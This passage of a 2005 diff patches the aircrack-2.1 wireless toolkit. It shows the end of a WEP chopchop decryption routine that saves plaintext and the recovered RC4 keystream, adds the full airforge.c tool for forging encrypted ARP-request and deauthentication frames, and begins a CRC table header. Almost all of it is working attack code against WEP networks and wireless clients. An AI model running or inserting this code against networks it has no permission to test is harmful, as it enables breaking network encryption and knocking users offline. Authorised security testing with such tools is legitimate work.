1574 | + chopped[z + 9] = savebuf[z + 9] ^ 0x00; | |
1575 | + | |
1576 | + for( i = z + 4; i < (int) pkh.caplen; i++ ) | |
1577 | + h80211[i - 4] = h80211[i] ^ chopped[i]; | |
1578 | + | |
1579 | + if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) ) | |
1580 | + printf( "\nWarning: ICV checksum verification FAILED!\n" ); | |
1581 | + | |
1582 | + pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */ | |
1583 | + pkh.len -= 4 + 4; | |
1584 | + | |
1585 | + h80211[1] &= 0xBF; /* remove the WEP bit, too */ | |
1586 | + | |
1587 | + /* save the decrypted packet */ | |
1588 | + | |
1589 | + sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap", | |
1590 | + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday, | |
1591 | + lt->tm_hour, lt->tm_min, lt->tm_sec ); | |
1592 | + | |
1593 | + printf( "\nSaving plaintext in %s\n", tmp_str ); | |
1594 | + | |
1595 | + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL ) | |
1596 | + { | |
1597 | + perror( "fopen(output pcap,wb+)" ); | |
1598 | + return( 1 ); | |
1599 | + } | |
1600 | + | |
1601 | + n = sizeof( struct pcap_file_header ); | |
1602 | + | |
1603 | + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n ) | |
1604 | + { | |
1605 | + perror( "fwrite(pcap file header)" ); | |
1606 | + return( 1 ); | |
1607 | + } | |
1608 | + | |
1609 | + n = sizeof( pkh ); | |
1610 | + | |
1611 | + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n ) | |
1612 | + { | |
1613 | + perror( "fwrite(packet header)" ); | |
1614 | + return( 1 ); | |
1615 | + } | |
1616 | + | |
1617 | + n = pkh.caplen; | |
1618 | + | |
1619 | + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n ) | |
1620 | + { | |
1621 | + perror( "fwrite(packet data)" ); | |
1622 | + return( 1 ); | |
1623 | + } | |
1624 | + | |
1625 | + /* save the RC4 xor mask (prga) */ | |
1626 | + | |
1627 | + sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor", | |
1628 | + lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday, | |
1629 | + lt->tm_hour, lt->tm_min, lt->tm_sec ); | |
1630 | + | |
1631 | + printf( "Saving keystream in %s\n", tmp_str ); | |
1632 | + | |
1633 | + if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL ) | |
1634 | + { | |
1635 | + perror( "fopen(output prga,wb+)" ); | |
1636 | + return( 1 ); | |
1637 | + } | |
1638 | + | |
1639 | + n = pkh.caplen + 8 - z; | |
1640 | + | |
1641 | + if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n ) | |
1642 | + { | |
1643 | + perror( "fwrite(prga data)" ); | |
1644 | + return( 1 ); | |
1645 | + } | |
1646 | + | |
1647 | + printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n", | |
1648 | + time( NULL ) - tt, | |
1649 | + (float) ( pkh.caplen - 6 - z ) / | |
1650 | + (float) ( time( NULL ) - tt ) ); | |
1651 | + | |
1652 | + /* that's all, folks */ | |
1653 | ||
1654 | return( 0 ); | |
1655 | } | |
1656 | diff -urN aircrack-2.1.orig/airforge.c aircrack-2.1/airforge.c | |
1657 | --- aircrack-2.1.orig/airforge.c 1970-01-01 01:00:00.000000000 +0100 | |
1658 | +++ aircrack-2.1/airforge.c 2005-04-22 08:51:21.933064968 +0200 | |
1659 | @@ -0,0 +1,267 @@ | |
1660 | +/* | |
1661 | + * 802.11 ARP-request & deauthentication frame forgery | |
1662 | + * | |
1663 | + * Copyright (C) 2005 Christophe Devine | |
1664 | + * | |
1665 | + * This program is free software; you can redistribute it and/or modify | |
1666 | + * it under the terms of the GNU General Public License as published by | |
1667 | + * the Free Software Foundation; either version 2 of the License, or | |
1668 | + * (at your option) any later version. | |
1669 | + * | |
1670 | + * This program is distributed in the hope that it will be useful, | |
1671 | + * but WITHOUT ANY WARRANTY; without even the implied warranty of | |
1672 | + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
1673 | + * GNU General Public License for more details. | |
1674 | + * | |
1675 | + * You should have received a copy of the GNU General Public License | |
1676 | + * along with this program; if not, write to the Free Software | |
1677 | + * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA | |
1678 | + */ | |
1679 | + | |
1680 | +#include <arpa/inet.h> | |
1681 | +#include <string.h> | |
1682 | +#include <stdlib.h> | |
1683 | +#include <stdio.h> | |
1684 | + | |
1685 | +#include "pcap-aireplay.h" | |
1686 | +#include "crctable.h" | |
1687 | + | |
1688 | +#define ARP_REQ \ | |
1689 | + "\x08\x40\x02\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ | |
1690 | + "\xFF\xFF\xFF\xFF\xFF\xFF\x80\x01\x55\x55\x55\x55\xAA\xAA\x03\x00" \ | |
1691 | + "\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xCC\xCC\xCC\xCC" \ | |
1692 | + "\xCC\xCC\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22" \ | |
1693 | + "\x00\x00\x00\x00" | |
1694 | + | |
1695 | +#define DEAUTH_REQ \ | |
1696 | + "\xC0\x00\x02\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \ | |
1697 | + "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00" | |
1698 | + | |
1699 | +char usage[] = | |
1700 | + | |
1701 | +"\n" | |
1702 | +" airforge 2.2 - (C) 2005 Christophe Devine\n" | |
1703 | +"\n" | |
1704 | +" usage 1: arp-request forgery\n" | |
1705 | +"\n" | |
1706 | +" arpforge <prga file> <type> <bssid> <mac src>\n" | |
1707 | +" <ip src> <ip dst> <output filename>\n" | |
1708 | +"\n" | |
1709 | +" usage 2: deauthentication frame forgery\n" | |
1710 | +"\n" | |
1711 | +" arpforge <bssid> <dst mac> <output filename>\n" | |
1712 | +"\n"; | |
1713 | + | |
1714 | +int getmac( char *s, unsigned char *mac ) | |
1715 | +{ | |
1716 | + int i = 0, n; | |
1717 | + | |
1718 | + while( sscanf( s, "%x", &n ) == 1 ) | |
1719 | + { | |
1720 | + if( n < 0 || n > 255 ) | |
1721 | + return( 1 ); | |
1722 | + | |
1723 | + mac[i] = n; | |
1724 | + | |
1725 | + if( ++i == 6 ) break; | |
1726 | + | |
1727 | + if( ! ( s = strchr( s, ':' ) ) ) | |
1728 | + break; | |
1729 | + | |
1730 | + s++; | |
1731 | + } | |
1732 | + | |
1733 | + return( i != 6 ); | |
1734 | +} | |
1735 | + | |
1736 | +int main( int argc, char *argv[] ) | |
1737 | +{ | |
1738 | + int n; | |
1739 | + unsigned long int crc; | |
1740 | + FILE *f_prga, *f_cap_out; | |
1741 | + | |
1742 | + unsigned char h80211[128]; | |
1743 | + unsigned char bssid[6]; | |
1744 | + unsigned char saddr[6]; | |
1745 | + unsigned char daddr[6]; | |
1746 | + unsigned char ipsrc[4]; | |
1747 | + unsigned char ipdst[4]; | |
1748 | + unsigned char prga[44]; | |
1749 | + | |
1750 | + struct pcap_file_header pfh; | |
1751 | + struct pcap_pkthdr pkh; | |
1752 | + struct timeval tv; | |
1753 | + | |
1754 | + if( argc == 4 ) | |
1755 | + goto forge_deauth; | |
1756 | + | |
1757 | + if( argc != 8 ) | |
1758 | + { | |
1759 | + printf( usage ); | |
1760 | + return( 1 ); | |
1761 | + } | |
1762 | + | |
1763 | + if( ( f_prga = fopen( argv[1], "rb" ) ) == NULL ) | |
1764 | + { | |
1765 | + perror( "fopen(input prga,rb)" ); | |
1766 | + return( 1 ); | |
1767 | + } | |
1768 | + | |
1769 | + memcpy( h80211, ARP_REQ, pkh.caplen = 68 ); | |
1770 | + | |
1771 | + n = atoi( argv[2] ); | |
1772 | + | |
1773 | + if( n != 1 && n != 2 ) | |
1774 | + { | |
1775 | + fprintf( stderr, "Invalid type: must be 1 " | |
1776 | + "(ToDS) or 2 (FromDS).\n" ); | |
1777 | + return( 1 ); | |
1778 | + } | |
1779 | + | |
1780 | + h80211[1] |= n; | |
1781 | + | |
1782 | + if( getmac( argv[3], bssid ) != 0 ) | |
1783 | + { | |
1784 | + fprintf( stderr, "Invalid BSSID.\n" ); | |
1785 | + return( 1 ); | |
1786 | + } | |
1787 | + | |
1788 | + if( getmac( argv[4], saddr ) != 0 ) | |
1789 | + { | |
1790 | + fprintf( stderr, "Invalid source MAC.\n" ); | |
1791 | + return( 1 ); | |
1792 | + } | |
1793 | + | |
1794 | + memcpy( daddr, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 ); | |
1795 | + | |
1796 | + if( ! inet_aton( argv[5], (struct in_addr *) ipsrc ) ) | |
1797 | + { | |
1798 | + fprintf( stderr, "Invalid source IP.\n" ); | |
1799 | + return( 1 ); | |
1800 | + } | |
1801 | + | |
1802 | + if( ! inet_aton( argv[6], (struct in_addr *) ipdst ) ) | |
1803 | + { | |
1804 | + fprintf( stderr, "Invalid destination IP.\n" ); | |
1805 | + return( 1 ); | |
1806 | + } | |
1807 | + | |
1808 | + if( n == 1 ) | |
1809 | + { | |
1810 | + memcpy( h80211 + 4, bssid, 6 ); | |
1811 | + memcpy( h80211 + 10, saddr, 6 ); | |
1812 | + memcpy( h80211 + 16, daddr, 6 ); | |
1813 | + } | |
1814 | + | |
1815 | + if( n == 2 ) | |
1816 | + { | |
1817 | + memcpy( h80211 + 10, bssid, 6 ); | |
1818 | + memcpy( h80211 + 16, saddr, 6 ); | |
1819 | + memcpy( h80211 + 4, daddr, 6 ); | |
1820 | + } | |
1821 | + | |
1822 | + memcpy( h80211 + 44, saddr, 6 ); | |
1823 | + memcpy( h80211 + 50, ipsrc, 4 ); | |
1824 | + memcpy( h80211 + 60, ipdst, 4 ); | |
1825 | + | |
1826 | + /* XXX: this source code lacks comments */ | |
1827 | + | |
1828 | + crc = 0xFFFFFFFF; | |
1829 | + | |
1830 | + for( n = 28; n < 64; n++ ) | |
1831 | + crc = crc_tbl[(crc ^ h80211[n]) & 0xFF] ^ (crc >> 8); | |
1832 | + | |
1833 | + crc = ~crc; | |
1834 | + | |
1835 | + h80211[64] = (crc ) & 0xFF; | |
1836 | + h80211[65] = (crc >> 8) & 0xFF; | |
1837 | + h80211[66] = (crc >> 16) & 0xFF; | |
1838 | + h80211[67] = (crc >> 24) & 0xFF; | |
1839 | + | |
1840 | + if( fread( prga, 44, 1, f_prga ) != 1 ) | |
1841 | + { | |
1842 | + fprintf( stderr, "fread(44 bytes) failed - prga too short ?\n" ); | |
1843 | + return( 1 ); | |
1844 | + } | |
1845 | + | |
1846 | + memcpy( h80211 + 24, prga, 4 ); | |
1847 | + | |
1848 | + for( n = 28; n < 68; n++ ) | |
1849 | + h80211[n] ^= prga[n - 24]; | |
1850 | + | |
1851 | + n = 7; | |
1852 | + | |
1853 | + goto write_packet; | |
1854 | + | |
1855 | +forge_deauth: | |
1856 | + | |
1857 | + memcpy( h80211, DEAUTH_REQ, pkh.caplen = 26 ); | |
1858 | + | |
1859 | + if( getmac( argv[1], bssid ) != 0 ) | |
1860 | + { | |
1861 | + fprintf( stderr, "Invalid BSSID.\n" ); | |
1862 | + return( 1 ); | |
1863 | + } | |
1864 | + | |
1865 | + if( getmac( argv[2], daddr ) != 0 ) | |
1866 | + { | |
1867 | + fprintf( stderr, "Invalid destination MAC.\n" ); | |
1868 | + return( 1 ); | |
1869 | + } | |
1870 | + | |
1871 | + memcpy( h80211 + 4, daddr, 6 ); | |
1872 | + memcpy( h80211 + 10, bssid, 6 ); | |
1873 | + memcpy( h80211 + 16, bssid, 6 ); | |
1874 | + | |
1875 | + n = 3; | |
1876 | + | |
1877 | +write_packet: | |
1878 | + | |
1879 | + if( ( f_cap_out = fopen( argv[n], "wb+" ) ) == NULL ) | |
1880 | + { | |
1881 | + fprintf( stderr, "failed: fopen(%s,wb+)\n", argv[7] ); | |
1882 | + return( 1 ); | |
1883 | + } | |
1884 | + | |
1885 | + pfh.magic = TCPDUMP_MAGIC; | |
1886 | + pfh.version_major = PCAP_VERSION_MAJOR; | |
1887 | + pfh.version_minor = PCAP_VERSION_MINOR; | |
1888 | + pfh.thiszone = 0; | |
1889 | + pfh.sigfigs = 0; | |
1890 | + pfh.snaplen = 65535; | |
1891 | + pfh.linktype = LINKTYPE_IEEE802_11; | |
1892 | + | |
1893 | + n = sizeof( struct pcap_file_header ); | |
1894 | + | |
1895 | + if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n ) | |
1896 | + { | |
1897 | + fprintf( stderr, "failed: fwrite(pcap file header)\n" ); | |
1898 | + return( 1 ); | |
1899 | + } | |
1900 | + | |
1901 | + gettimeofday( &tv, NULL ); | |
1902 | + | |
1903 | + pkh.tv_sec = tv.tv_sec; | |
1904 | + pkh.tv_usec = tv.tv_usec; | |
1905 | + pkh.len = pkh.caplen; | |
1906 | + | |
1907 | + n = sizeof( pkh ); | |
1908 | + | |
1909 | + if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n ) | |
1910 | + { | |
1911 | + fprintf( stderr, "fwrite(packet header) failed\n" ); | |
1912 | + return( 1 ); | |
1913 | + } | |
1914 | + | |
1915 | + n = pkh.caplen; | |
1916 | + | |
1917 | + if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n ) | |
1918 | + { | |
1919 | + fprintf( stderr, "fwrite(packet data) failed\n" ); | |
1920 | + return( 1 ); | |
1921 | + } | |
1922 | + | |
1923 | + printf( "Done.\n" ); | |
1924 | + | |
1925 | + return( 0 ); | |
1926 | +} | |
1927 | diff -urN aircrack-2.1.orig/crctable.h aircrack-2.1/crctable.h | |
1928 | --- aircrack-2.1.orig/crctable.h 1970-01-01 01:00:00.000000000 +0100 | |
1929 | +++ aircrack-2.1/crctable.h 2005-04-22 08:51:21.934064816 +0200 | |
1930 | @@ -0,0 +1,108 @@ | |
1931 | +#ifndef _CRCTABLE_H | |
1932 | +#define _CRCTABLE_H | |
1933 | + | |
1934 | +const unsigned long int crc_tbl[256] = | |
1935 | +{ | |
1936 | + 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, | |
1937 | + 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, | |
1938 | + 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, | |
1939 | + 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, | |
1940 | + 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, | |
1941 | + 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, | |
1942 | + 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, | |
1943 | + 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, | |
1944 | + 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, | |
1945 | + 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, | |
1946 | + 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, | |
1947 | + 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, | |
1948 | + 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, | |
1949 | + 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, | |
1950 | + 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, | |
1951 | + 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, | |
1952 | + 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, | |
1953 | + 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, | |
1954 | + 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, | |
1955 | + 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, | |
1956 | + 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, | |
1957 | + 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, | |
1958 | + 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, | |
1959 | + 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, | |
1960 | + 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, | |
1961 | + 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, | |
1962 | + 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, | |
1963 | + 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, | |
1964 | + 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, | |
1965 | + 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, | |
1966 | + 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, | |
1967 | + 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D | |
1968 | +}; | |
1969 | + | |
1970 | +const unsigned char crc_chop_tbl[256][4] = | |
1971 | +{ | |
1972 | + { 0x26,0x70,0x6A,0x0F }, { 0x67,0x76,0x1B,0xD4 }, { 0xE5,0x7A,0xF9,0x62 }, { 0xA4,0x7C,0x88,0xB9 }, | |
1973 | + { 0xA0,0x65,0x4C,0xD4 }, { 0xE1,0x63,0x3D,0x0F }, { 0x63,0x6F,0xDF,0xB9 }, { 0x22,0x69,0xAE,0x62 }, | |
1974 | + { 0x6B,0x5D,0x57,0x62 }, { 0x2A,0x5B,0x26,0xB9 }, { 0xA8,0x57,0xC4,0x0F }, { 0xE9,0x51,0xB5,0xD4 }, | |
1975 | + { 0xED,0x48,0x71,0xB9 }, { 0xAC,0x4E,0x00,0x62 }, { 0x2E,0x42,0xE2,0xD4 }, { 0x6F,0x44,0x93,0x0F }, | |
1976 | + { 0xBC,0x2A,0x10,0xD5 }, { 0xFD,0x2C,0x61,0x0E }, { 0x7F,0x20,0x83,0xB8 }, { 0x3E,0x26,0xF2,0x63 }, | |
1977 | + { 0x3A,0x3F,0x36,0x0E }, { 0x7B,0x39,0x47,0xD5 }, { 0xF9,0x35,0xA5,0x63 }, { 0xB8,0x33,0xD4,0xB8 }, | |
1978 | + { 0xF1,0x07,0x2D,0xB8 }, { 0xB0,0x01,0x5C,0x63 }, { 0x32,0x0D,0xBE,0xD5 }, { 0x73,0x0B,0xCF,0x0E }, | |
1979 | + { 0x77,0x12,0x0B,0x63 }, { 0x36,0x14,0x7A,0xB8 }, { 0xB4,0x18,0x98,0x0E }, { 0xF5,0x1E,0xE9,0xD5 }, | |
1980 | + { 0x53,0xC3,0xEF,0x60 }, { 0x12,0xC5,0x9E,0xBB }, { 0x90,0xC9,0x7C,0x0D }, { 0xD1,0xCF,0x0D,0xD6 }, | |
1981 | + { 0xD5,0xD6,0xC9,0xBB }, { 0x94,0xD0,0xB8,0x60 }, { 0x16,0xDC,0x5A,0xD6 }, { 0x57,0xDA,0x2B,0x0D }, | |
1982 | + { 0x1E,0xEE,0xD2,0x0D }, { 0x5F,0xE8,0xA3,0xD6 }, { 0xDD,0xE4,0x41,0x60 }, { 0x9C,0xE2,0x30,0xBB }, | |
1983 | + { 0x98,0xFB,0xF4,0xD6 }, { 0xD9,0xFD,0x85,0x0D }, { 0x5B,0xF1,0x67,0xBB }, { 0x1A,0xF7,0x16,0x60 }, | |
1984 | + { 0xC9,0x99,0x95,0xBA }, { 0x88,0x9F,0xE4,0x61 }, { 0x0A,0x93,0x06,0xD7 }, { 0x4B,0x95,0x77,0x0C }, | |
1985 | + { 0x4F,0x8C,0xB3,0x61 }, { 0x0E,0x8A,0xC2,0xBA }, { 0x8C,0x86,0x20,0x0C }, { 0xCD,0x80,0x51,0xD7 }, | |
1986 | + { 0x84,0xB4,0xA8,0xD7 }, { 0xC5,0xB2,0xD9,0x0C }, { 0x47,0xBE,0x3B,0xBA }, { 0x06,0xB8,0x4A,0x61 }, | |
1987 | + { 0x02,0xA1,0x8E,0x0C }, { 0x43,0xA7,0xFF,0xD7 }, { 0xC1,0xAB,0x1D,0x61 }, { 0x80,0xAD,0x6C,0xBA }, | |
1988 | + { 0xCC,0x16,0x61,0xD0 }, { 0x8D,0x10,0x10,0x0B }, { 0x0F,0x1C,0xF2,0xBD }, { 0x4E,0x1A,0x83,0x66 }, | |
1989 | + { 0x4A,0x03,0x47,0x0B }, { 0x0B,0x05,0x36,0xD0 }, { 0x89,0x09,0xD4,0x66 }, { 0xC8,0x0F,0xA5,0xBD }, | |
1990 | + { 0x81,0x3B,0x5C,0xBD }, { 0xC0,0x3D,0x2D,0x66 }, { 0x42,0x31,0xCF,0xD0 }, { 0x03,0x37,0xBE,0x0B }, | |
1991 | + { 0x07,0x2E,0x7A,0x66 }, { 0x46,0x28,0x0B,0xBD }, { 0xC4,0x24,0xE9,0x0B }, { 0x85,0x22,0x98,0xD0 }, | |
1992 | + { 0x56,0x4C,0x1B,0x0A }, { 0x17,0x4A,0x6A,0xD1 }, { 0x95,0x46,0x88,0x67 }, { 0xD4,0x40,0xF9,0xBC }, | |
1993 | + { 0xD0,0x59,0x3D,0xD1 }, { 0x91,0x5F,0x4C,0x0A }, { 0x13,0x53,0xAE,0xBC }, { 0x52,0x55,0xDF,0x67 }, | |
1994 | + { 0x1B,0x61,0x26,0x67 }, { 0x5A,0x67,0x57,0xBC }, { 0xD8,0x6B,0xB5,0x0A }, { 0x99,0x6D,0xC4,0xD1 }, | |
1995 | + { 0x9D,0x74,0x00,0xBC }, { 0xDC,0x72,0x71,0x67 }, { 0x5E,0x7E,0x93,0xD1 }, { 0x1F,0x78,0xE2,0x0A }, | |
1996 | + { 0xB9,0xA5,0xE4,0xBF }, { 0xF8,0xA3,0x95,0x64 }, { 0x7A,0xAF,0x77,0xD2 }, { 0x3B,0xA9,0x06,0x09 }, | |
1997 | + { 0x3F,0xB0,0xC2,0x64 }, { 0x7E,0xB6,0xB3,0xBF }, { 0xFC,0xBA,0x51,0x09 }, { 0xBD,0xBC,0x20,0xD2 }, | |
1998 | + { 0xF4,0x88,0xD9,0xD2 }, { 0xB5,0x8E,0xA8,0x09 }, { 0x37,0x82,0x4A,0xBF }, { 0x76,0x84,0x3B,0x64 }, | |
1999 | + { 0x72,0x9D,0xFF,0x09 }, { 0x33,0x9B,0x8E,0xD2 }, { 0xB1,0x97,0x6C,0x64 }, { 0xF0,0x91,0x1D,0xBF }, | |
2000 | + { 0x23,0xFF,0x9E,0x65 }, { 0x62,0xF9,0xEF,0xBE }, { 0xE0,0xF5,0x0D,0x08 }, { 0xA1,0xF3,0x7C,0xD3 }, | |
2001 | + { 0xA5,0xEA,0xB8,0xBE }, { 0xE4,0xEC,0xC9,0x65 }, { 0x66,0xE0,0x2B,0xD3 }, { 0x27,0xE6,0x5A,0x08 }, | |
2002 | + { 0x6E,0xD2,0xA3,0x08 }, { 0x2F,0xD4,0xD2,0xD3 }, { 0xAD,0xD8,0x30,0x65 }, { 0xEC,0xDE,0x41,0xBE }, | |
2003 | + { 0xE8,0xC7,0x85,0xD3 }, { 0xA9,0xC1,0xF4,0x08 }, { 0x2B,0xCD,0x16,0xBE }, { 0x6A,0xCB,0x67,0x65 }, | |
2004 | + { 0xB3,0xBB,0x0D,0x6A }, { 0xF2,0xBD,0x7C,0xB1 }, { 0x70,0xB1,0x9E,0x07 }, { 0x31,0xB7,0xEF,0xDC }, | |
2005 | + { 0x35,0xAE,0x2B,0xB1 }, { 0x74,0xA8,0x5A,0x6A }, { 0xF6,0xA4,0xB8,0xDC }, { 0xB7,0xA2,0xC9,0x07 }, | |
2006 | + { 0xFE,0x96,0x30,0x07 }, { 0xBF,0x90,0x41,0xDC }, { 0x3D,0x9C,0xA3,0x6A }, { 0x7C,0x9A,0xD2,0xB1 }, | |
2007 | + { 0x78,0x83,0x16,0xDC }, { 0x39,0x85,0x67,0x07 }, { 0xBB,0x89,0x85,0xB1 }, { 0xFA,0x8F,0xF4,0x6A }, | |
2008 | + { 0x29,0xE1,0x77,0xB0 }, { 0x68,0xE7,0x06,0x6B }, { 0xEA,0xEB,0xE4,0xDD }, { 0xAB,0xED,0x95,0x06 }, | |
2009 | + { 0xAF,0xF4,0x51,0x6B }, { 0xEE,0xF2,0x20,0xB0 }, { 0x6C,0xFE,0xC2,0x06 }, { 0x2D,0xF8,0xB3,0xDD }, | |
2010 | + { 0x64,0xCC,0x4A,0xDD }, { 0x25,0xCA,0x3B,0x06 }, { 0xA7,0xC6,0xD9,0xB0 }, { 0xE6,0xC0,0xA8,0x6B }, | |
2011 | + { 0xE2,0xD9,0x6C,0x06 }, { 0xA3,0xDF,0x1D,0xDD }, { 0x21,0xD3,0xFF,0x6B }, { 0x60,0xD5,0x8E,0xB0 }, | |
2012 | + { 0xC6,0x08,0x88,0x05 }, { 0x87,0x0E,0xF9,0xDE }, { 0x05,0x02,0x1B,0x68 }, { 0x44,0x04,0x6A,0xB3 }, | |
2013 | + { 0x40,0x1D,0xAE,0xDE }, { 0x01,0x1B,0xDF,0x05 }, { 0x83,0x17,0x3D,0xB3 }, { 0xC2,0x11,0x4C,0x68 }, | |
2014 | + { 0x8B,0x25,0xB5,0x68 }, { 0xCA,0x23,0xC4,0xB3 }, { 0x48,0x2F,0x26,0x05 }, { 0x09,0x29,0x57,0xDE }, | |
2015 | + { 0x0D,0x30,0x93,0xB3 }, { 0x4C,0x36,0xE2,0x68 }, { 0xCE,0x3A,0x00,0xDE }, { 0x8F,0x3C,0x71,0x05 }, | |
2016 | + { 0x5C,0x52,0xF2,0xDF }, { 0x1D,0x54,0x83,0x04 }, { 0x9F,0x58,0x61,0xB2 }, { 0xDE,0x5E,0x10,0x69 }, | |
2017 | + { 0xDA,0x47,0xD4,0x04 }, { 0x9B,0x41,0xA5,0xDF }, { 0x19,0x4D,0x47,0x69 }, { 0x58,0x4B,0x36,0xB2 }, | |
2018 | + { 0x11,0x7F,0xCF,0xB2 }, { 0x50,0x79,0xBE,0x69 }, { 0xD2,0x75,0x5C,0xDF }, { 0x93,0x73,0x2D,0x04 }, | |
2019 | + { 0x97,0x6A,0xE9,0x69 }, { 0xD6,0x6C,0x98,0xB2 }, { 0x54,0x60,0x7A,0x04 }, { 0x15,0x66,0x0B,0xDF }, | |
2020 | + { 0x59,0xDD,0x06,0xB5 }, { 0x18,0xDB,0x77,0x6E }, { 0x9A,0xD7,0x95,0xD8 }, { 0xDB,0xD1,0xE4,0x03 }, | |
2021 | + { 0xDF,0xC8,0x20,0x6E }, { 0x9E,0xCE,0x51,0xB5 }, { 0x1C,0xC2,0xB3,0x03 }, { 0x5D,0xC4,0xC2,0xD8 }, | |
2022 | + { 0x14,0xF0,0x3B,0xD8 }, { 0x55,0xF6,0x4A,0x03 }, { 0xD7,0xFA,0xA8,0xB5 }, { 0x96,0xFC,0xD9,0x6E }, | |
